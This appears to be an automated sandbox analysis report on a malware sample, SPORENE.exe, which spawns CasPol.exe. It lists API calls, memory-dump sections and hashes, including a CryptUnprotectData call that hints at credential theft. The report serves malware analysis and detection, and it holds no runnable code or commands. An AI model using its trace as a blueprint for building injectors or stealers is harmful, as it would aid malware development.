lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00403019, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248), ref: 0040645C

Strings

C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 00406412

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe
API String ID: 3356406503-3749879609
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,77313420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E58, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003), ref: 00405E6E

Strings

C:\Users\user\Desktop, xrefs: 00405E58

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SPORENE.exe PID: 2100 Parent PID: 4660 SPORENE.exeCOMMON

Executed Functions

Function 00401724, Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 1005COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6%*), ref: 00401729

Strings

VB5!6%*, xrefs: 00401724

Memory Dump Source

Source File: 00000004.00000002.214564861704.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.214564838174.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.214565034420.0000000000421000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.214565057385.0000000000422000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.214565349879.0000000001853000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: 49ca7899a6d604be6bf3442c12e22db80400758bd1cb62f159e8631ee4b9eb49
Instruction ID: d75cae8dad3e15aafd6d97e108f4f9e1e4e5bc980460d590f2dde34121b0546a
Opcode Fuzzy Hash: 49ca7899a6d604be6bf3442c12e22db80400758bd1cb62f159e8631ee4b9eb49
Instruction Fuzzy Hash: A462BA3115968A8FDB03DF38CAA5951FFB0FE2271032A1797D4948B1A3D324F56ACB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: CasPol.exe PID: 528 Parent PID: 2100 CasPol.exeCOMMON

Executed Functions

Function 00BA6908, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 396COMMON

Download Yara Rule

Strings

<0( , xrefs: 00BA6DD0
s, xrefs: 00BA6932

Memory Dump Source

Source File: 0000000A.00000002.219003785163.0000000000BA0000.00000040.00000010.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID:
String ID: <0( $s
API String ID: 0-108322530
Opcode ID: 970f3a336da9fdf61ab995011f22f67fcab728517c357a53bfad85107b027ad3
Instruction ID: 3271cc68c0380da8ad59ea5685a7e842965e0c2dd5272335900ec342d8edc425
Opcode Fuzzy Hash: 970f3a336da9fdf61ab995011f22f67fcab728517c357a53bfad85107b027ad3
Instruction Fuzzy Hash: 2AF15C74A04219CFDB14CFA8C984BADBBF1FF89314F1985A9E405AF2A1DB70AD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013D92D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 013D9A15

Strings

s, xrefs: 013D99CA

Memory Dump Source

Source File: 0000000A.00000002.219006551210.00000000013D0000.00000040.00000010.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID: s
API String ID: 834300711-453955339
Opcode ID: e638b2b6b98de5cf6e092efd7553e294adaacc2f94163f373b447238b5baf976
Instruction ID: 115fe637f05b288e4e202fe1ea666f672b2c5d0baff09960e2bb570070a1fa25
Opcode Fuzzy Hash: e638b2b6b98de5cf6e092efd7553e294adaacc2f94163f373b447238b5baf976
Instruction Fuzzy Hash: BA112676800209DFDB10CF99D844BEEBBF8EF88324F148419EA14A7251C379A954DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013D99A8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 013D9A15

Strings

s, xrefs: 013D99CA

Memory Dump Source

Source File: 0000000A.00000002.219006551210.00000000013D0000.00000040.00000010.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID: s
API String ID: 834300711-453955339
Opcode ID: e8168dbd3b9d682d16d28106e42cc39ff0745f1dd8fd23c906b6e93475d29d5a
Instruction ID: 8aa3f463b9bd93f5f7f9a578f3126624de92d3f7fd212e69e82f512dd6059365
Opcode Fuzzy Hash: e8168dbd3b9d682d16d28106e42cc39ff0745f1dd8fd23c906b6e93475d29d5a
Instruction Fuzzy Hash: 381134B68002499FDF10CF99C944BEEBFF8EF48324F14841AE654A7210C379A954DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E46EA0, Relevance: 2.5, APIs: 1, Instructions: 958libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68917c752d253ca868e22a09568ed898e6e0f2c7500e782712c2f85e0bd4c5ff
Instruction ID: c4a933bd5f30312e687446e02d8926834f384798317ff2dbf9256aedf80647c9
Opcode Fuzzy Hash: 68917c752d253ca868e22a09568ed898e6e0f2c7500e782712c2f85e0bd4c5ff
Instruction Fuzzy Hash: 0AA2F474A052288FCB64DF70C88879DB7B6BF48305F2081EAD54AA3754EB359E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DED5020, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 313COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DED53F6

Strings

lM( , xrefs: 1DED51A5
\O( , xrefs: 1DED50F5
#, xrefs: 1DED51B9
s, xrefs: 1DED53AF
\O( , xrefs: 1DED520D

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: HandleModule
String ID: \O( $\O( $lM( $s$#
API String ID: 4139908857-2622178360
Opcode ID: 890b7bce64bd39f9dcafbac5d8fc548c31d653178055b41c66815bde7b6eec10
Instruction ID: f4abbaf945b05918a6b8d4641423a01a9ba5e9b2239810c675164c409097d443
Opcode Fuzzy Hash: 890b7bce64bd39f9dcafbac5d8fc548c31d653178055b41c66815bde7b6eec10
Instruction Fuzzy Hash: 89C1AF74A04B458FCB05CFB9C8845AEBBF5BF89204B01892AD416DB795DF34E806CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1DEDA348, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 1DEDA3C6
GetCurrentThread.KERNEL32 ref: 1DEDA403
GetCurrentProcess.KERNEL32 ref: 1DEDA440
GetCurrentThreadId.KERNEL32 ref: 1DEDA499

Strings

s, xrefs: 1DEDA364
8( , xrefs: 1DEDA3EE

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: 8( $s
API String ID: 2063062207-2684759115
Opcode ID: 79c0fd837ed7e07cf791222073d20a7fc6e704cfb55365dc99bf58c259de3a78
Instruction ID: 791891bc9a842f3e413d1bbf4ac16ebd266ca95865582d51e12373ca9f558414
Opcode Fuzzy Hash: 79c0fd837ed7e07cf791222073d20a7fc6e704cfb55365dc99bf58c259de3a78
Instruction Fuzzy Hash: 455169B0D00709CFDB14CFA9C5487EEBBF5AF88305F208419D409A72A0DB74A945CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00BA14EC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00BA2791,00000800), ref: 00BA2822

Strings

&( , xrefs: 00BA14EC
s, xrefs: 00BA27D7

Memory Dump Source

Source File: 0000000A.00000002.219003785163.0000000000BA0000.00000040.00000010.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: &( $s
API String ID: 1029625771-2646638112
Opcode ID: 32448a3d06a0cf53d403da4d6d060bb20258aafa78d91a461d35d33c37de1c9f
Instruction ID: 747b8ff4c8296906cbb5d61b78e849b446c25771e27f9a3362d90bb96e28f5b7
Opcode Fuzzy Hash: 32448a3d06a0cf53d403da4d6d060bb20258aafa78d91a461d35d33c37de1c9f
Instruction Fuzzy Hash: C41126B6D042099FDB10CF9AD444BDEFBF8EF89310F10846AE915A7200C3B8A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 014C9F18, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

s, xrefs: 014CA00F

Memory Dump Source

Source File: 0000000A.00000002.219006841322.00000000014C0000.00000040.00000010.sdmp, Offset: 014C0000, based on PE: false

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: f82267c7e2d6014f6d191cd611537b9d426859f1cafc3e52be891c803b33822c
Instruction ID: e4fe3288fac481c65bae9f98b819066d77de0c12c8f90048bd61a4abf9398850
Opcode Fuzzy Hash: f82267c7e2d6014f6d191cd611537b9d426859f1cafc3e52be891c803b33822c
Instruction Fuzzy Hash: F3413371D0434A8FCB04CFA9D8142EEBBF4EFCA320F14866BD504A7260DB789844CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DED682D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DED694A

Strings

s, xrefs: 1DED6866

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: CreateWindow
String ID: s
API String ID: 716092398-453955339
Opcode ID: 6757a4659d20de0cce973314b333c4c0cc7e1b4b7a9b20ac819b7ded75cbc040
Instruction ID: 00981d09f49b322e9c339011f411f5ffd2320fcefcd3249c012e05dfce1b9948
Opcode Fuzzy Hash: 6757a4659d20de0cce973314b333c4c0cc7e1b4b7a9b20ac819b7ded75cbc040
Instruction Fuzzy Hash: C351E1B1D007599FDB14CF99C884ADEBBB1BF88314F24812EE819AB211DB709845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0103A3F9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0103A50C

Strings

s, xrefs: 0103A480

Memory Dump Source

Source File: 0000000A.00000002.219004569650.0000000001030000.00000040.00000010.sdmp, Offset: 01030000, based on PE: false

Similarity

API ID: Open
String ID: s
API String ID: 71445658-453955339
Opcode ID: c14c224c0ed5f7ab4f0ebd1c962c9da2d397c0e71fb83356caf9a90065b21ac9
Instruction ID: e640a00734359ce31270060e32eb18426ece564954a9e216c00985babccfc6b1
Opcode Fuzzy Hash: c14c224c0ed5f7ab4f0ebd1c962c9da2d397c0e71fb83356caf9a90065b21ac9
Instruction Fuzzy Hash: 894158B1E00249CFDB00CFA9C548B8EBFF9AF88304F25856AE548AB351D7759949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1DED6838, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DED694A

Strings

s, xrefs: 1DED6866

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: CreateWindow
String ID: s
API String ID: 716092398-453955339
Opcode ID: a01937f2e36822000175149816338ec9254bf8261ecb07f134f066bc645bd572
Instruction ID: 8de5099898ec6035552e520dd74ded9ba5878e7b31568f213ee0ae8f817b19fe
Opcode Fuzzy Hash: a01937f2e36822000175149816338ec9254bf8261ecb07f134f066bc645bd572
Instruction Fuzzy Hash: E841B0B1D00709DFDF14CF99C884ADEBBB5BF88314F24812AE819AB210DB75A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1DEDA184, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1DEDB521

Strings

s, xrefs: 1DEDB477

Memory Dump Source

Source File: 0000000A.00000002.219015117566.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID: s
API String ID: 2714655100-453955339
Opcode ID: 0eb901ed74f08ed70e456227becd6df696f51afc561ac587256ce95d208a303f
Instruction ID: 1102388b4897dcc79a56df3e352fbc3ea8090b30a07f3cd56a79a34d29b0bed0
Opcode Fuzzy Hash: 0eb901ed74f08ed70e456227becd6df696f51afc561ac587256ce95d208a303f
Instruction Fuzzy Hash: 60417BB8900709CFCB44CF99C488AAABBF9FF88314F14C459D519AB321DB74A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0103AB04, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0103ABC9

Strings

s, xrefs: 0103AB3E

Memory Dump Source

Source File: 0000000A.00000002.219004569650.0000000001030000.00000040.00000010.sdmp, Offset: 01030000, based on PE: false

Similarity

API ID: QueryValue
String ID: s
API String ID: 3660427363-453955339
Opcode ID: 29c10b8b69e523c4fa95def3abed4d3363e3cfdc2d575fc3b43c6c994657d875
Instruction ID: d3e9887b3aaef842d623c53b3296a44dfb84738b1d8da65498905d010a43897a
Opcode Fuzzy Hash: 29c10b8b69e523c4fa95def3abed4d3363e3cfdc2d575fc3b43c6c994657d875
Instruction Fuzzy Hash: EA41F0B1E00258DFDB10CFA9C984ADEBFF9AF88310F14846AE858AB350D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01035184, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0103ABC9

Strings

s, xrefs: 0103AB3E

Memory Dump Source

Source File: 0000000A.00000002.219004569650.0000000001030000.00000040.00000010.sdmp, Offset: 01030000, based on PE: false

Similarity

API ID: QueryValue
String ID: s
API String ID: 3660427363-453955339
Opcode ID: 2086ed97924f153eccf8248bf6348853f831391cb1fcc1d60b879a1a0e55ce0b
Instruction ID: 5eaf2eef20cd42c0a63c99e1ca90515179504645f490c98bbbda6e064be9b806
Opcode Fuzzy Hash: 2086ed97924f153eccf8248bf6348853f831391cb1fcc1d60b879a1a0e55ce0b
Instruction Fuzzy Hash: 8231D3B1E00258DFDB14CF99C984ADEBFF9AF48310F14846AE958AB311D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01035178, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0103A50C

Strings

s, xrefs: 0103A480

Memory Dump Source

Source File: 0000000A.00000002.219004569650.0000000001030000.00000040.00000010.sdmp, Offset: 01030000, based on PE: false

Similarity

API ID: Open
String ID: s
API String ID: 71445658-453955339
Opcode ID: d23a3e73e7828b9e4f803dc90c07c1a4c2f410ad514863c518734bfb81c7e8b1
Instruction ID: b092b854423c6b9509cb1d1df39527a9b70c0753fe089be3bf7c5e2ac4b66f3d
Opcode Fuzzy Hash: d23a3e73e7828b9e4f803dc90c07c1a4c2f410ad514863c518734bfb81c7e8b1
Instruction Fuzzy Hash: C63112B0D00249DFDB10CF99C588A8EFFF9BF88304F24856AE549AB341C7759945CB94

